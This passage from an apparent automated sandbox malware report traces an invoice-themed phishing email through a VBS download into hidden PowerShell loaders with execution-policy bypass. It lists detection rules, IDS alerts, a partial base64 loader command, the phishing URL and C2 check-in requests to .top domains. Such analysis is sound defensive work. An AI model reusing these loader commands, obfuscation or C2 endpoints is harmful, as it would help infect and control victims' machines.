              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\ANwibhLHfyrt.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\ANwibhLHfyrt.ps1, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiR4VGN3aUNQOW15QWhlZ0NzU3lZdEdaeDlpNkk5aHRtM1pXWkY0ZkVqdDNMVmdScVRIajZhaDZpWUw2ZUVqZ0Z0NXpoVjdwTWNXZDNtOHE4ckswWTd6cnNMViA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgNSB8ICUge1tjaGFyXSRffSkpOwokcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRiA9IFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpOwokbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSBbaW50XShHZXQtRGF0ZSAtRm9ybWF0IG1tKTsKJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkID0gMzsKSWYgKCRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNSArICRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNUFkZCAtZ3QgNTkpIHsKICAgICRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gJHFrcWpIdmJ5QUMwc2ZnZXlKdzAwdHNZTEhJTFpab093Y1pKS3VFb1l4ZllrS3lrUmFuaTVqWmdLa1lPbks3QmFZSXIxRWF4NXdQSHVYTm85RWdCYmRZVGlNamNNR0YgKyAxOwogICAgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ID0gJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ICsgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkIC0gNjA7Cn0gRWxzZSB7CiAgICAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgKyAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDVBZGQ7Cn07CiRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gSWYgKFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpICsgMSAtZ3QgMjMpIHsiMDAifSBFbHNlIHskcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3d
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.com/EPsAIgNy0L, ParentImage: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentProcessId: 6556, ParentProcessName: chrome.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , ProcessId: 8124, ProcessName: wscript.exe
              Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
              Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6228, TargetFilename: C:\Users\Public\Documents\ANwibhLHfyrt.ps1
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat", CommandLine: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 8124, ParentProcessName: wscript.exe, ProcessCommandLine: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat", ProcessId: 5164, ProcessName: powershell.exe
              Sigma detected: Office Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 2952, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
              Sigma detected: Suspicious Electron Application Child Processes
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.com/EPsAIgNy0L, ParentImage: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentProcessId: 6556, ParentProcessName: chrome.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , ProcessId: 8124, ProcessName: wscript.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.com/EPsAIgNy0L, ParentImage: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentProcessId: 6556, ParentProcessName: chrome.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , ProcessId: 8124, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat", CommandLine: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 8124, ParentProcessName: wscript.exe, ProcessCommandLine: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat", ProcessId: 5164, ProcessName: powershell.exe
              Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6228, TargetFilename: C:\Users\Public\Documents\ANwibhLHfyrt.ps1
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7040, ProcessName: svchost.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-18T10:45:27.939903+010020570631A Network Trojan was detected192.168.2.1849713168.100.9.2980TCP
              2024-11-18T10:45:27.939903+010020570631A Network Trojan was detected192.168.2.1849713168.100.9.2980TCP
              2024-11-18T10:45:27.939903+010020570631A Network Trojan was detected192.168.2.1849713168.100.9.2980TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-18T10:45:41.472487+010020387553Misc activity192.168.2.18498581.1.1.153UDP
              2024-11-18T10:45:41.472487+010020387553Misc activity192.168.2.18498581.1.1.153UDP
              2024-11-18T10:45:41.472487+010020387553Misc activity192.168.2.18498581.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-18T10:45:27.939903+010028582911A Network Trojan was detected192.168.2.1849713168.100.9.2980TCP
              2024-11-18T10:45:27.939903+010028582911A Network Trojan was detected192.168.2.1849713168.100.9.2980TCP
              2024-11-18T10:45:27.939903+010028582911A Network Trojan was detected192.168.2.1849713168.100.9.2980TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              Phishing

              barindex
              AI detected potential phishing Email
              Source: EmailJoe Sandbox AI: Detected potential phishing email: Contains a suspicious external link to 'livecasinotipuk.com' which is not a legitimate business domain. Uses urgency and threats of legal action to pressure recipient into clicking the link. Claims to be about an unpaid invoice but provides no legitimate payment methods, only a suspicious link
              Source: unknownHTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.18:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.18:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.18:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.18:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 51.91.79.17:443 -> 192.168.2.18:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.23.209.168:443 -> 192.168.2.18:49717 version: TLS 1.2

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeChild: C:\Windows\System32\wscript.exe
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: chrome.exeMemory has grown: Private usage: 7MB later: 27MB

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2856654 - Severity 1 - ETPRO MALWARE TA582 CnC Checkin : 192.168.2.18:49714 -> 206.188.196.37:80
              Source: Network trafficSuricata IDS: 2057063 - Severity 1 - ET MALWARE Mints.Loader CnC Activity (GET) : 192.168.2.18:49713 -> 168.100.9.29:80
              Source: Network trafficSuricata IDS: 2858291 - Severity 1 - ETPRO MALWARE TA582 CnC Checkin : 192.168.2.18:49713 -> 168.100.9.29:80
              Source: Network trafficSuricata IDS: 2038755 - Severity 3 - ET MALWARE Observed DNS Query to Temporary File Hosting Domain (temp .sh) : 192.168.2.18:49858 -> 1.1.1.1:53
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: global trafficHTTP traffic detected: GET /1.php?s=mints13 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: rigzuvzi3bnz3.topConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /thovl94iuyhtr.php?id=user-PC&key=33431133382&s=mints13 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: danknlmmaahlimg.topConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.com
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: rigzuvzi3bnz3.top
              Source: global trafficDNS traffic detected: DNS query: danknlmmaahlimg.top
              Source: global trafficDNS traffic detected: DNS query: temp.sh
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownHTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.18:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.18:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.18:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.18:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 51.91.79.17:443 -> 192.168.2.18:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.23.209.168:443 -> 192.168.2.18:49717 version: TLS 1.2

              System Summary

              barindex
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1"
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3393
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3393
              Source: classification engineClassification label: mal100.troj.expl.evad.winMSG@34/32@7/187
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241118T0444360487-2952.etl
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.ini
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg"
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "E581CB4A-9BB8-4348-8486-140C3ED4F7CF" "00D1D5C8-8F94-47CD-842C-62D6A2C573DE" "2952" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.com/EPsAIgNy0L
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2024,i,7829079969028914035,538796100542532529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "E581CB4A-9BB8-4348-8486-140C3ED4F7CF" "00D1D5C8-8F94-47CD-842C-62D6A2C573DE" "2952" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.com/EPsAIgNy0L
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2024,i,7829079969028914035,538796100542532529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat
